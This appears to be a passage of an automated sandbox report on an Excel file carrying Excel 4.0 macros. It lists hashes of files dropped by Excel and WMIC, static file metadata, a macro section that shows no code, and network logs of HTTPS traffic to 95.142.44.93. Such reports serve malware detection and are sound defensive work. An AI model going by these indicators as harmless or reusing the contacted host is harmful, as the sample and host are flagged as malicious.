SHA-512: | 4DFC0887B9E26EE12B7D70CD543C2C3105EE9753746005B86D520EBFC52C50E787818F42A05EC120FA1F52FB927AE7A93DAFA1FCD40624E1E8A29439683E5EB0 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.652208144122537 |
Encrypted: | false |
SSDEEP: | 12:8YrXUwcuElPCH2AaSY3ouIk+WrjAZ/2bD/LC5Lu4t2Y+xIBjKZm:8cDatAZiD+87aB6m |
MD5: | 86C3AEC66964F8B6866416E31E93962D |
SHA1: | 3C2C30D348DA6A080E03B52ED039E806F29420D2 |
SHA-256: | BC2C38396F73A0F45177582F64F18992E369E9955EAA89B3DB11823DB19FF1A0 |
SHA-512: | 7F6EB1D91A178E2E39ABBE6560701395E4E9C6F5E1D0F3E4516E33A27D672EF3CB59756004835213BF5935B68946580A7346DD242648B8F61614EC081D103DA2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 100 |
Entropy (8bit): | 4.721266094754729 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWV2npWrXCMjD2npWrXCmxWV2npWrXCv:djlW3KWvWI |
MD5: | 4651D7899D0089D49B209C1EEFFC6F66 |
SHA1: | 272A788D9B7814F71C0E53A39A8457512DD43BC2 |
SHA-256: | 7DD3385C0FA67DE6A3477E1E63F4598339456786CC8C0E4B36F667A7D3BAB4FC |
SHA-512: | 93F4F6602DDC965678EB92C40E9C73174C52A2CBC8D111181744E646380B5E41F0197925086ED935B75D1C5627FBE684C373081B73404FC1CBCEB329959B9BC0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1040132 |
Entropy (8bit): | 7.8545301896779085 |
Encrypted: | false |
SSDEEP: | 24576:lQPPPPPD5rIf8w195QMfYBVf1xBARkgaNyn:BQMQh/m6Nyn |
MD5: | 90305FD4215DD8A8785DC7F6DD4143A6 |
SHA1: | A90ED0830BF373E01681C2B491101CD5AF1904A2 |
SHA-256: | 384AC8CE1FF6CF1E8DBDF47CE04898887D669811B982655881FD2FB6F8BCED4D |
SHA-512: | 50D827E068818BB082EB80487D4CF76C8D835CB6BEAA950F1A4BD6185C61F59F0F34328F3154CBA5274C49F3778878E315B173B5470D46482D674FD3BECB0851 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Windows\SysWOW64\wbem\WMIC.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160 |
Entropy (8bit): | 5.083203110114614 |
Encrypted: | false |
SSDEEP: | 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglVvlJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/eg3leAin |
MD5: | 04F5182CC4DB0183A73CC7E970598ED7 |
SHA1: | B8E7038F8D7FA64B8FC04EFEBB0100998379C772 |
SHA-256: | BB316A44410761BABF389A30CA439E952E13C90178E4D3E9C54F45B83998EBE0 |
SHA-512: | C875CC61B3E6DBDACFD26D6FA0D28F134572D1C8EF955357A2C40BC3B6FF6A6637C325B0237D1DA7E281595A85197E74B54C7FC4FA57B17C9E09F7913A64C199 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.994144310692157 |
TrID: |
|
File name: | 3F97s4aQjB.xlsx |
File size: | 468533 |
MD5: | 1ac719c744d22f42e4978e7b55828435 |
SHA1: | 4ddc7358f615987bf92ed9192430693db65b097c |
SHA256: | d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb |
SHA512: | 736bcf96ca99c893c535c555133a092400e1dbc5f5143500d152c537bccc9d3faf7d541b3b11be82b68bbf4c7a1528c5fa3b45394d5b2b958c4d1d4d024e7d22 |
SSDEEP: | 12288:ag+iWCVTHlJFnI6TDEeTSH/NJDjXcXdeanuxZ2:4iVVTHxNcoSJDK1nuxA |
File Content Preview: | PK...........R................docProps/PK..........!.,...............docProps/app.xml.S.N.0.....`.N...Zu.#T.XQ.....u&.EbG.......m.ZNp{3o........"-8....x.Q.F.\.ML......x.&..5...xz-...Kg.p... a|LK.f..W%....m.SXWK...0[.Z..U.5.d.Qt.`.`r./.^..)N[..hn.....vM... |
File Icon |
---|
Icon Hash: | 74ecd0d2d6d6d0dc |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "3F97s4aQjB.xlsx" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/10/21-19:29:51.613358 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | 192.168.2.3 | 8.8.8.8 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 10, 2021 19:29:43.258378983 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.336587906 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.336781979 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.337631941 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.415893078 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.415950060 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.415990114 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.416032076 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.416059971 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.416095018 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.416150093 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.416157007 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.416161060 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.417321920 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.417413950 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.435136080 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.513605118 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.513775110 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.514929056 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593521118 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593578100 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593615055 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593641996 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593655109 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593673944 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593679905 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593693018 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593698978 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593744040 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593754053 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593787909 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593801975 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593828917 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593853951 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593871117 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593875885 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593909979 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.593928099 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.593962908 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672254086 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672313929 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672349930 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672365904 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672389984 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672410011 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672415972 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672430038 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672449112 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672468901 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672497988 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672511101 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672522068 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672554016 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672568083 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672604084 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672606945 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672646999 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672655106 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672684908 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672698021 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672725916 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672734022 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672765017 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672780991 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672804117 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672816992 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672842979 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672852039 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672879934 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672894001 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672926903 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.672930956 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672972918 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.672985077 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.673012018 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.673027992 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.673051119 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.673064947 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.673100948 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751229048 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751271009 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751307011 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751346111 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751380920 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751396894 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751418114 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751431942 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751437902 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751441956 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751446009 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751455069 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751470089 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751499891 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751517057 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751539946 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751554012 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751576900 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751591921 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
Jun 10, 2021 19:29:43.751615047 CEST | 443 | 49724 | 95.142.44.93 | 192.168.2.3 |
Jun 10, 2021 19:29:43.751627922 CEST | 49724 | 443 | 192.168.2.3 | 95.142.44.93 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 10, 2021 19:29:26.869281054 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:26.919629097 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:27.712269068 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:27.767049074 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:30.299875021 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:30.350756884 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:31.149571896 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:31.202770948 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:31.946738005 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:31.999885082 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:32.823888063 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:32.877093077 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:35.992733955 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:36.043184996 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:38.526139975 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:38.576669931 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:39.581397057 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:39.675406933 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:40.068955898 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:40.119657993 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:40.349926949 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:40.421042919 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:41.355870008 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:41.429215908 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:42.421807051 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:42.480777979 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:43.004868031 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:43.055016994 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:43.196017981 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:43.256313086 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:44.098253012 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:44.148494005 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:44.418675900 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:44.477164030 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:45.140666962 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
